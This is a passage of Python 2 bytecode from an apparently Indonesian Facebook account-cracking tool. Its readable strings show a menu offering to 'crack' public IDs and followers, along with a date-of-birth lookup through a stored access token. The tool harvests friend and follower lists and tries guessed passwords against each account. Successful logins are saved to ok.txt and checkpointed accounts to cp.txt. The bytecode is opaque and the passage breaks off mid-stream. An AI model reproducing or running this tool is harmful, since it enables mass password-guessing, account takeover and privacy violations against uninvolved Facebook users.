02\x05\x01\x05\x01\x05\x01\x07\x01\x15\x01\x05\x01\x05\x01\x05\x01\t\x01\x05\x02\x0f\x10\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\n\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn+\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rF\x00\x01\x01\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHt\r\x00d\x08\x00\x83\x01\x00}\x00\x00t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x03\x00\x83\x01\x00\x01yA\x00t\x0e\x00j\x0f\x00d\n\x00|\x00\x00\x17d\x0b\x00\x17t\x02\x00\x17d\x0c\x00t\x10\x00\x83\x01\x01j\x11\x00}\x01\x00t\x12\x00j\x13\x00|\x01\x00\x83\x01\x00}\x02\x00|\x02\x00d\r\x00\x19}\x03\x00Wna\x00\x04t\x03\x00t\x04\x00f\x02\x00k\n\x00rY\x01\x01\x01\x01t\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x0e\x00GHd\x05\x00GHt\r\x00d\x0f\x00\x83\x01\x00\x01t\x14\x00\x83\x00\x00\x01n\x01\x00Xt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01d\x05\x00GHd\x06\x00t\x0b\x00\x17d\x07\x00\x17t\x0c\x00\x17GHd\x05\x00GHd\x10\x00|\x00\x00\x17GHd\x11\x00|\x03\x00\x17GHd\x05\x00GHd\x12\x00d\x13\x00\x14GHd\x05\x00GHt\x15\x00\x83\x00\x00\x01d\x00\x00S(\x14\x00\x00\x00Ns\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00i\x01\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x0e\x00\x00\x00Find DOB Of IDs\x0f\x00\x00\x00 Put id/user : s$\x00\x00\x00echo -e "\t Finding DOB " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=R.\x00\x00\x00Rp\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93mDOB not founds\x1a\x00\x00\x00 Press enter to try again s\x14\x00\x00\x00\x1b[1;93mAccount ID : s\r\x00\x00\x00\x1b[1;93mDOB : i/\x00\x00\x00RE\x00\x00\x00(\x16\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x15\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x0e\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00Rd\x00\x00\x00t\x04\x00\x00\x00conf(\x04\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00Rk\x00\x00\x00t\x04\x00\x00\x00dobs(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ru\x00\x00\x005\x02\x00\x00sR\x00\x00\x00\x00\x02\x03\x01\x19\x01\x13\x01\r\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\r\x01\x03\x01$\x01\x0f\x01\x0e\x01\x13\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\t\x01\t\x01\x05\x01\t\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n\x1d\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x07\x00t\x03\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ns\'\x00\x00\x00\x1b[1;93mDo you want to find again (y/n) Rr\x00\x00\x00t\x01\x00\x00\x00n(\x04\x00\x00\x00R\x0e\x00\x00\x00Ru\x00\x00\x00Rd\x00\x00\x00R\x0f\x00\x00\x00(\x01\x00\x00\x00t\x02\x00\x00\x00ol(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rv\x00\x00\x00`\x02\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x11\x00t\x0f\x00\x17d\x12\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHd\x0f\x00d\x10\x00\x14GHd\x08\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s.\x00\x00\x00\t \x1b[1;31mTurn on mobile data OR wifi\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again i/\x00\x00\x00RE\x00\x00\x00s\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In Users\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x1d\x00\x00\x00\x1b[1;93m[3] Return method menus\x11\x00\x00\x00\x1b[1;93m[4] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00R;\x00\x00\x00R\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R<\x00\x00\x00R\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00l_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R>\x00\x00\x00R?\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x10\x00\x00\x00h\x02\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\t\x01\x05\x01\x15\x01\x05\x01\t\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00sq\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xA\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\xf0\x01|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x17\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\x18\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x16\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\x9f\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03WnN\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1d\x00t\x12\x00\x17d\x1e\x00\x17t\x13\x00\x17GHd\x04\x00GHt\x14\x00\x83\x00\x00\x01d\x1f\x00t\x15\x00t\x16\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x17\x00j\x18\x00d \x00\x83\x01\x00\x01d!\x00GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d$\x00\x86\x00\x00}\n\x00t\x19\x00d%\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1a\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHd&\x00GHd\'\x00t\x15\x00t\x16\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17d(\x00\x17t\x15\x00t\x16\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd"\x00d#\x00\x14GHd\x04\x00GHt\x00\x00d)\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(*\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x10\x00\x00\x00 Put Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x0e\x00\x00\x00Target user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R@\x00\x00\x00R\r\x00\x00\x00s\x0f\x00\x00\x00 Put Id/user : R.\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x16\x00\x00\x00\n Press enter to back s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000RA\x00\x00\x00RB\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00\x1b[1;93mSILAHKAN DITUNGGU process is running in backgroundi/\x00\x00\x00RE\x00\x00\x00c\x01\x00\x00\x00\x0f\x00\x00\x00\x04\x00\x00\x00\x13\x00\x00\x00sh\x07\x00\x00|\x00\x00}\x01\x00|\x01\x00j\x00\x00d\x01\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00y?\x07|\x03\x00d\x02\x00\x17}\x04\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x04\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xc2\x00d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n\x97\x06d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r)\x01d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x04\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x04\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x04\x00\x17\x83\x01\x00\x01n0\x06|\x03\x00d\x11\x00\x17}\t\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xcd\x01d\x07\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n\x8c\x05d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r4\x02d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\t\x00\x17\x83\x01\x00\x01n%\x05|\x03\x00d\x12\x00\x17}\n\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\n\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xd8\x02d\x07\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x81\x04d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00r?\x03d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\n\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\n\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\n\x00\x17\x83\x01\x00\x01n\x1a\x04|\x03\x00d\x13\x00\x17}\x0b\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0b\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xe3\x03d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01nv\x03d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rJ\x04d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0b\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0b\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\x0b\x00|\x02\x00|\x0b\x00\x17\x83\x01\x00\x01n\x0f\x03d\x14\x00}\x0c\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0c\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xea\x04d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01no\x02d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rQ\x05d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0c\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0c\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0c\x00\x17\x83\x01\x00\x01n\x08\x02d\x15\x00}\r\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\r\x00\x17\x83\x01\x00j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xeb\x05d\x07\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01nn\x01d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rR\x06d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\r\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\r\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\r\x00\x17\x83\x01\x00\x01n\x07\x01d\x16\x00}\x0e\x00t\x01\x00j\x02\x00d\x03\x00|\x02\x00\x17d\x04\x00\x17|\x0e\x00\x17d\x05\x00t\x03\x00\x83\x01\x01j\x04\x00}\x05\x00t\x05\x00j\x06\x00|\x05\x00\x83\x01\x00}\x06\x00d\x06\x00|\x06\x00k\x06\x00r\xf2\x06d\x07\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17d\t\x00\x17GHt\x07\x00d\n\x00d\x0b\x00\x83\x02\x00}\x07\x00|\x07\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x07\x00j\t\x00\x83\x00\x00\x01\x88\x01\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01ng\x00d\r\x00|\x06\x00d\x0e\x00\x19k\x06\x00rY\x07d\x0f\x00|\x02\x00\x17d\x08\x00\x17|\x0e\x00\x17GHt\x07\x00d\x10\x00d\x0b\x00\x83\x02\x00}\x08\x00|\x08\x00j\x08\x00|\x02\x00d\x08\x00\x17|\x0e\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x08\x00j\t\x00\x83\x00\x00\x01\x88\x00\x00j\n\x00|\x02\x00|\x0e\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x17\x00\x00\x00NR@\x00\x00\x00RF\x00\x00\x00s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=R.\x00\x00\x00R/\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;32m[Successful] \x1b[1;30ms\x03\x00\x00\x00 | s\x07\x00\x00\x00\x1b[0;97ms\x06\x00\x00\x00ok.txtRH\x00\x00\x00s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comR0\x00\x00\x00s\x14\x00\x00\x00\x1b[1;93m[Checkpoint] s\x06\x00\x00\x00cp.txtRJ\x00\x00\x00RK\x00\x00\x00RL\x00\x00\x00RN\x00\x00\x00RM\x00\x00\x00RO\x00\x00\x00(\x0c\x00\x00\x00RP\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R \x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00RR\x00\x00\x00t\x07\x00\x00\x00apppend(\x0f\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00R7\x00\x00\x00R\x17\x00\x00\x00RU\x00\x00\x00R9\x00\x00\x00R*\x00\x00\x00R?\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R^\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Ra\x00\x00\x00\xec\x02\x00\x00s\xdc\x00\x00\x00\x00\x01\x06\x01\x15\x01\x03\x01\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\n\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01\x1e\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s \x00\x00\x00\x1b[1;93mThe process has completeds\x14\x00\x00\x00\x1b[1;93mTotal Ok/Cp :Rb\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;93mPress entet to back (\x1b\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 